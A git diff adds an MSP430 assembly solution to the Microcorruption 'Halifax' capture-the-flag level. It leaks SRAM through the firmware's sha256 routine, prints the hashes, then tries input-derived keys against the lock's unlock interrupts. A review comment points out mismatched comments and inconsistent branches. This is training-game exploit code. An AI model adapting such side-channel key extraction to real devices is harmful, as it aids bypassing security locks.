diff --git a/sample-asm/shellcode.asm b/sample-asm/shellcode.asm
new file mode 100644
index 0000000..0eac4f5
--- /dev/null
+++ b/sample-asm/shellcode.asm
@@ -0,0 +1,99 @@
+; © 2023-2024 John Breaux
+; Comtains spoilers for Microcorruption Halifax! Be warned!
+; just hash the first 0x140 B and stick them in memory
+
+
+const:
+.define msize 0x1 ; length of each hash in bytes
+.define hsize 0x3 ; bytes kept per hash (only needs to be 3 to determine 1 byte of sram)
+.define sr_len 0x140 ; number of bytes in sram to dump
+.define ha_len 0x3c0 ; number of bytes in hash array (hsize * sr_len)
+.define haddr 0x7000 ; address of the big hash array
+.define iaddr 0x8000 ; address of the sram input buffer
+.define kaddr 0x9000 ; address of the key buffer
+external_data:
+.define HEX_LUT 0x4710; "0123456789ABCDEF"
+external_func:
+; INT(int interrupt, ...)
+.define INT #0x4550
+; getsn(void *dest, size_t len)
+.define getsn #0x4568
+; putchar(char character)
+.define putchar #0x4578
+; puts(char *str)
+.define puts #0x4586
+; memcpy(void *dest, void *src, size_t len)
+.define memcpy #0x45a4
+; sha256_internal(void * sram_addr, size_t sr_len, void * sha_buf)
+.define sha256_internal #0x45b6
+; memset(void* buf, char value, size_t length)
+.define memset #0x45c8
+
+get_sram_hashes:
+ clr r11 ; loop variable in r11
+ mov #msize, r14 ; r14 = 1
+ mov #haddr, r13 ; set destination to 0x8000
+ sr_loop:
+ mov r11, r15 ; mov addr r15
+ call sha256_internal ;
+ add #hsize, r13 ; keep 3 bytes of the output
+ inc r11 ; inc r11
+ cmp #sr_len, r11 ; do that 0x1000 times
+ jnc sr_loop
+
+print_hex:
+ clr r11;
+ ph_loop:
+ mov.b haddr(r11), r14
+ mov.b r14, r15
+ rra r15 ; using rra here instead of rra.b means the value won't roll into the highest bit
+ rra r15 ; which negates the need to and 0xf, r15
+ rra r15
+ rra r15
+ clrc
+ and #0xf, r14
+ mov.b HEX_LUT(r15), r15
+ call putchar ;
+ mov.b HEX_LUT(r14), r15
+ call putchar ;
+ inc r11 ; inc r11
+ cmp #ha_len, r11 ; do that sram_length*3 times
+ jnc ph_loop
+
+ mov.b #0xa, r15 ; '\n'
+ call #0x4578 ; putchar ('\n')
+
+
+take_input:
+ mov #sr_len, r14
+ mov #iaddr, r15
+ call getsn ;
+
+check_all_passwords:
+ ;for i in 0..sr_len:
+ clr r9
+ pw_loop:
+ ; memcpy(kaddr, iaddr + i, len)
+ mov #0x10, r13
+ mov #iaddr, r14
+ add r9, r14
+ mov #kaddr, r15
+ call memcpy
+ ; INT (0x42, key)
+ push #kaddr
+ push #0x42
+ call INT
+ add #4, sp
+ ; INT(7f)
+ unlock7f:
+ push #0
+ push #0
+ push #0x7f
+ call INT
+ add #6, sp
+ inc r9
+ cmp #sr_len, r9
+ jl pw_loop
+
+end:
+ ret
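Review bot: Two end-of-line comments in get_sram_hashes contradict the constants they describe: `mov #haddr, r13 ; set destination to 0x8000` (haddr is defined as 0x7000; 0x8000 is iaddr) and `cmp #sr_len, r11 ; do that 0x1000 times` (sr_len is 0x140), so they should read `; r13 = hash array at haddr` and `; repeat sr_len (0x140) times`. The newline at the end of print_hex is emitted with `call #0x4578 ; putchar ('\n')` although the file already names that address, so `call putchar` would keep the external_func block the single place those addresses live. The loop in check_all_passwords closes with the signed branch `jl pw_loop` while the two earlier loops use the unsigned `jnc`; with sr_len = 0x140 both agree, but `jnc pw_loop` (alias `jlo`) keeps the three loops consistent. The key length in `mov #0x10, r13` is the only un-named magic number among the otherwise named constants and could join the const block as, for example, `.define klen 0x10`.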